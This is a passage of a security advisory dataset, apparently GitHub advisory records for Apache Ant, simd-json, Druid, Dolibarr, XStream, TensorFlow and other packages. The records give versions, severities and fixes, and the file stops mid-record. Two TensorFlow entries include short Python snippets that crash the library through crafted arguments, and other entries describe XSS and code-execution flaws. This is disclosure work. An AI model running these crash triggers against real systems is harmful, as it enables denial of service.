+1.4.0,GHSA-q5r4-cfpx-h6fh,2022-02-08T21:08:16Z,2021-08-02T16:56:17Z,,['CVE-2021-36373'],Improper Handling of Length Parameter Inconsistency in Apache Ant,"When reading a specially crafted TAR archive an Apache Ant build can be made to allocate large amounts of memory that finally leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Apache Ant prior to 1.9.16 and 1.10.11 were affected.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ant:ant'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.16'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.ant:ant'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.0'}, {'fixed': '1.10.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36373'}, {'type': 'WEB', 'url': 'https://ant.apache.org/security.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r27919fd4db07c487239c1d9771f480d89ce5ee2750aa9447309b709a@%3Ccommits.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r544c9e8487431768465b8b2d13982c75123109bd816acf839d46010d@%3Ccommits.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r54afdab05e01de970649c2d91a993f68a6b00cd73e6e34e16c832d46%40%3Cuser.ant.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rad36f470647c5a7c02dd78c9973356d2840766d132b597b6444e373a@%3Cnotifications.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf4bb79751a02889623195715925e4fd8932dd3c97e0ade91395a96c6@%3Cdev.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210819-0007/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-130'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-15T19:15:21Z', 'nvd_published_at': '2021-07-14T07:15:00Z'}" +1.4.0,GHSA-gwfj-pw2x-h6c2,2023-06-13T21:01:35Z,2021-08-25T20:43:56Z,,['CVE-2019-15550'],Out of bounds read in simd-json,The affected version of this crate did not guard against accessing memory beyond the range of its input data. A pointer cast to read the data into a 256-bit register could lead to a segmentation fault when the end plus the 32 bytes (256 bit) read would overlap into the next page during string parsing. This allows an attacker to eventually crash a service. The flaw was corrected by using a padding buffer for the last read from the input. So that we are we never read over the boundary of the input data.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'simd-json'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.13'}, {'fixed': '0.1.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15550'}, {'type': 'WEB', 'url': 'https://github.com/Licenser/simdjson-rs/pull/27'}, {'type': 'PACKAGE', 'url': 'https://github.com/Licenser/simdjson-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0008.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:23:48Z', 'nvd_published_at': None}" +1.4.0,GHSA-793h-6f7r-6qvm,2023-09-26T13:12:16Z,2021-08-13T15:21:50Z,,['CVE-2021-26920'],Druid ingestion system Authenticated users can read data from other sources than intended,"In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.druid:druid-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26920'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r29e45561343cc5cf7d3290ee0b0e94e565faab19c20d022df9b5e29c%40%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r304dfe56a5dfe1b2d9166b24d2c74ad1c6730338b20aef77a00ed2be@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r61aab724cf97d80da7f02d50e9af6de5c7c40dd92dab7518746fbaa2@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/02/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/09/24/1'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-06T15:02:28Z', 'nvd_published_at': '2021-07-02T08:15:00Z'}" +1.4.0,GHSA-rqf8-8c89-mw29,2021-08-31T21:14:23Z,2021-08-10T16:08:16Z,,['CVE-2021-23416'],Cross-site Scripting in curly-bracket-parser,"This affects all versions of package curly-bracket-parser. + When used as a template library, it does not properly sanitize the user input. + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'curly-bracket-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23416'}, {'type': 'PACKAGE', 'url': 'https://github.com/magynhard/curly-bracket-parser'}, {'type': 'WEB', 'url': 'https://github.com/magynhard/curly-bracket-parser/blob/master/src/curly-bracket-parser/curly-bracket-parser.js#23L31'}, {'type': 'WEB', 'url': 'https://github.com/magynhard/curly-bracket-parser/blob/master/src/curly-bracket-parser/curly-bracket-parser.js%23L31'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CURLYBRACKETPARSER-1297106'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T18:39:58Z', 'nvd_published_at': '2021-07-28T16:15:00Z'}" +1.4.0,GHSA-438g-fx34-4h9m,2021-08-19T21:06:40Z,2021-08-25T20:48:38Z,,['CVE-2020-35892'],Out of bounds read in simple-slab,An issue was discovered in the simple-slab crate before 0.3.3 for Rust. index() allows an out-of-bounds read.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'simple-slab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35892'}, {'type': 'WEB', 'url': 'https://github.com/nathansizemore/simple-slab/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/nathansizemore/simple-slab'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0039.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:06:40Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-vj88-5667-w56p,2021-08-24T17:44:58Z,2021-08-25T21:00:11Z,2021-08-24T17:44:58Z,[],Singleton lacks bounds on Send and Sync.,"`Singleton` is meant to be a static object that can be initialized lazily. In +order to satisfy the requirement that `static` items must implement `Sync`, +`Singleton` implemented both `Sync` and `Send` unconditionally. + +This allows for a bug where non-`Sync` types such as `Cell` can be used in +singletons and cause data races in concurrent programs. + +The flaw was corrected in commit `b0d2bd20e` by adding trait bounds, requiring +the contaiend type to implement `Sync`. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'ruspiro-singleton'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/RusPiRo/ruspiro-singleton/issues/10'}, {'type': 'PACKAGE', 'url': 'https://github.com/RusPiRo/ruspiro-singleton'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0115.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-06T19:10:18Z', 'nvd_published_at': None}" +1.4.0,GHSA-hw7r-qrhp-5pff,2021-08-25T15:42:30Z,2021-08-30T16:16:46Z,,[],Unauthorized property update in CheckboxGroup component in Vaadin 12-14 and 15-20,"Improper check in `CheckboxGroup` in `com.vaadin:vaadin-checkbox-flow` versions 1.2.0 prior to 2.0.0 (Vaadin 12.0.0 prior to 14.0.0), 2.0.0 prior to 3.0.0 (Vaadin 14.0.0 prior to 14.5.0), 3.0.0 through 4.0.1 (Vaadin 15.0.0 through 17.0.11), 14.5.0 through 14.6.7 (Vaadin 14.5.0 through 14.6.7), and 18.0.0 through 20.0.5 (Vaadin 18.0.0 through 20.0.5) allows attackers to modify the value of a disabled `Checkbox` inside enabled `CheckboxGroup` component via unspecified vectors. + +- https://vaadin.com/security/cve-2021-33605","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '14.6.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '20.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-hw7r-qrhp-5pff'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T15:42:30Z', 'nvd_published_at': None}" +1.4.0,GHSA-fcwc-p4fc-c5cc,2021-08-23T19:11:53Z,2021-08-25T14:43:42Z,,['CVE-2021-37643'],Null pointer dereference in `MatrixDiagPartOp`,"### Impact +If a user does not provide a valid padding value to `tf.raw_ops.MatrixDiagPartOp`, then the code triggers a null pointer dereference (if input is empty) or produces invalid behavior, ignoring all values after the first: + +```python +import tensorflow as tf + +tf.raw_ops.MatrixDiagPartV2( + input=tf.ones(2,dtype=tf.int32), + k=tf.ones(2,dtype=tf.int32), + padding_value=[]) +``` + +Although this example is given for `MatrixDiagPartV2`, all versions of the operation are affected. + +The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/linalg/matrix_diag_op.cc#L89) reads the first value from a tensor buffer without first checking that the tensor has values to read from. + +### Patches +We have patched the issue in GitHub commit [482da92095c4d48f8784b1f00dda4f81c28d2988](https://github.com/tensorflow/tensorflow/commit/482da92095c4d48f8784b1f00dda4f81c28d2988). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fcwc-p4fc-c5cc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37643'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/482da92095c4d48f8784b1f00dda4f81c28d2988'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T19:11:53Z', 'nvd_published_at': '2021-08-12T19:15:00Z'}" +1.4.0,GHSA-368f-29c3-4f2r,2023-06-13T22:36:54Z,2021-08-25T20:58:50Z,,['CVE-2020-36437'],Data race in conqueue,"Affected versions of this crate unconditionally implemented `Send`/`Sync` for `QueueSender`, allowing to send non-Send `T` to other threads by invoking `(&QueueSender).send()`. + +This fails to prevent users from creating data races by sending types like `Rc` or `Arc>` to other threads, which can lead to memory corruption. The flaw was corrected in commit `1e462c3` by imposing `T: Send` to both `Send`/`Sync` impls for `QueueSender`/`QueueReceiver`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'conqueue'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36437'}, {'type': 'WEB', 'url': 'https://github.com/longshorej/conqueue/commit/1e462c32e7933821ddb26dc49fd4ffa5aeca97b8'}, {'type': 'PACKAGE', 'url': 'https://github.com/longshorej/conqueue'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/conqueue/RUSTSEC-2020-0117.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0117.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-10T17:36:54Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-9279-7hph-r3xw,2021-07-26T23:00:52Z,2021-08-02T16:54:09Z,,['CVE-2021-30129'],Buffer Overflow in Apache Mina SSHD,A vulnerability in sshd-core of Apache Mina SSHD allows an attacker to overflow the server causing an OutOfMemory error. This issue affects the SFTP and port forwarding features of Apache Mina SSHD version 2.0.0 and later versions. It was addressed in Apache Mina SSHD 2.7.0,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sshd:sshd-mina'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.sshd:sshd-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30129'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SSHD-1125'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6d4f78e192a0c8eabd671a018da464024642980ecd24096bde6db36f%40%3Cusers.mina.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6d4f78e192a0c8eabd671a018da464024642980ecd24096bde6db36f@%3Cusers.mina.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/red01829efa2a8c893c4baff4f23c9312bd938543a9b8658e172b853b@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/12/1'}]","{'cwe_ids': ['CWE-772'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T23:19:33Z', 'nvd_published_at': '2021-07-12T12:15:00Z'}" +1.4.0,GHSA-cpv8-6xgr-rmf6,2022-08-10T23:57:35Z,2021-08-30T16:22:46Z,,['CVE-2021-25955'],Dolibarr Cross-site Scripting vulnerability,"In `Dolibarr ERP CRM`, WYSIWYG Editor module, v2.8.1 to v13.0.2 are affected by a stored XSS vulnerability that allows low privileged application users to store malicious scripts in the `Private Note` field at `/adherents/note.php?id=1` endpoint. These scripts are executed in a victim’s browser when they open the page containing the vulnerable field. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator. The injected scripts can extract the Session ID, which can lead to full Account takeover of the admin and due to other vulnerability (Improper Access Control on Private notes) a low privileged user can update the private notes which could lead to privilege escalation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'dolibarr/dolibarr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.1'}, {'fixed': '14.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 13.0.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25955'}, {'type': 'WEB', 'url': 'https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e'}, {'type': 'PACKAGE', 'url': 'https://github.com/Dolibarr/dolibarr/'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T19:42:53Z', 'nvd_published_at': '2021-08-15T21:15:00Z'}" +1.4.0,GHSA-wcg3-cvx6-7396,2022-12-06T00:16:25Z,2021-08-25T20:56:46Z,,['CVE-2020-26235'],Segmentation fault in time,"### Impact + +Unix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library. + +The affected functions from time 0.2.7 through 0.2.22 are: + +- `time::UtcOffset::local_offset_at` +- `time::UtcOffset::try_local_offset_at` +- `time::UtcOffset::current_local_offset` +- `time::UtcOffset::try_current_local_offset` +- `time::OffsetDateTime::now_local` +- `time::OffsetDateTime::try_now_local` + +The affected functions in time 0.1 (all versions) are: + +- `at` +- `at_utc` +- `now` + +Non-Unix targets (including Windows and wasm) are unaffected. + +### Patches + +In some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld. + +Users and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code. + +Users of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series. + +### Workarounds + +Library authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment. + +### References + +[time-rs/time#293](https://github.com/time-rs/time/issues/293).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'time'}, 'ecosystem_specific': {'affected_functions': ['time::UtcOffset::local_offset_at', 'time::UtcOffset::try_local_offset_at', 'time::UtcOffset::current_local_offset', 'time::UtcOffset::try_current_local_offset', 'time::OffsetDateTime::now_local', 'time::OffsetDateTime::try_now_local', 'time::at', 'time::at_utc', 'time::now']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.0'}, {'fixed': '0.2.23'}]}], 'database_specific': {'last_known_affected_version_range': '< 0.2.0'}}, {'package': {'ecosystem': 'crates.io', 'name': 'time'}, 'ecosystem_specific': {'affected_functions': ['time::UtcOffset::local_offset_at', 'time::UtcOffset::try_local_offset_at', 'time::UtcOffset::current_local_offset', 'time::UtcOffset::try_current_local_offset', 'time::OffsetDateTime::now_local', 'time::OffsetDateTime::try_now_local']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.7'}, {'fixed': '0.2.23'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26235'}, {'type': 'WEB', 'url': 'https://github.com/time-rs/time/issues/293'}, {'type': 'WEB', 'url': 'https://crates.io/crates/time/0.2.23'}, {'type': 'PACKAGE', 'url': 'https://github.com/time-rs/time'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0071.html'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:06:21Z', 'nvd_published_at': '2020-11-24T22:15:00Z'}" +1.4.0,GHSA-qrx8-8545-4wg2,2022-02-08T20:59:49Z,2021-08-25T14:47:38Z,,['CVE-2021-39148'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39148](https://x-stream.github.io/CVE-2021-39148.html). + +### Credits +wh1t3p1g from TSRC (Tencent Security Response Center) found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-qrx8-8545-4wg2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39148'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39148.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:19Z', 'nvd_published_at': '2021-08-23T18:15:00Z'}" +1.4.0,GHSA-qxjq-v4wf-ppvh,2023-06-13T17:12:14Z,2021-08-25T20:49:47Z,,['CVE-2020-35903'],Out of bounds read in dync,"VecCopy::data is created as a Vec of u8 but can be used to store and retrieve elements of different types leading to misaligned access. + +The issue was resolved in v0.5.0 by replacing data being stored by Vec with a custom managed pointer. Elements are now stored and retrieved using types with proper alignment corresponding to original types.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'dync'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35903'}, {'type': 'WEB', 'url': 'https://github.com/elrnv/dync/issues/4'}, {'type': 'PACKAGE', 'url': 'https://github.com/elrnv/dync'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0050.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:50:45Z', 'nvd_published_at': '2020-12-31T09:15:00Z'}" +1.4.0,GHSA-m7fm-4jfh-jrg6,2021-08-24T12:39:49Z,2021-08-25T14:43:07Z,,['CVE-2021-37652'],Use after free in boosted trees creation,"### Impact +The implementation for `tf.raw_ops.BoostedTreesCreateEnsemble` can result in a use after free error if an attacker supplies specially crafted arguments: + +```python +import tensorflow as tf + +v= tf.Variable([0.0]) +tf.raw_ops.BoostedTreesCreateEnsemble( + tree_ensemble_handle=v.handle, + stamp_token=[0], + tree_ensemble_serialized=['0']) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/boosted_trees/resource_ops.cc#L55) uses a reference counted resource and decrements the refcount if the initialization fails, as it should. However, when the code was written, the resource was represented as a naked pointer but later refactoring has changed it to be a smart pointer. Thus, when the pointer leaves the scope, a subsequent `free`-ing of the resource occurs, but this fails to take into account that the refcount has already reached 0, thus the resource has been already freed. During this double-free process, members of the resource object are accessed for cleanup but they are invalid as the entire resource has been freed. + +### Patches +We have patched the issue in GitHub commit [5ecec9c6fbdbc6be03295685190a45e7eee726ab](https://github.com/tensorflow/tensorflow/commit/5ecec9c6fbdbc6be03295685190a45e7eee726ab). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 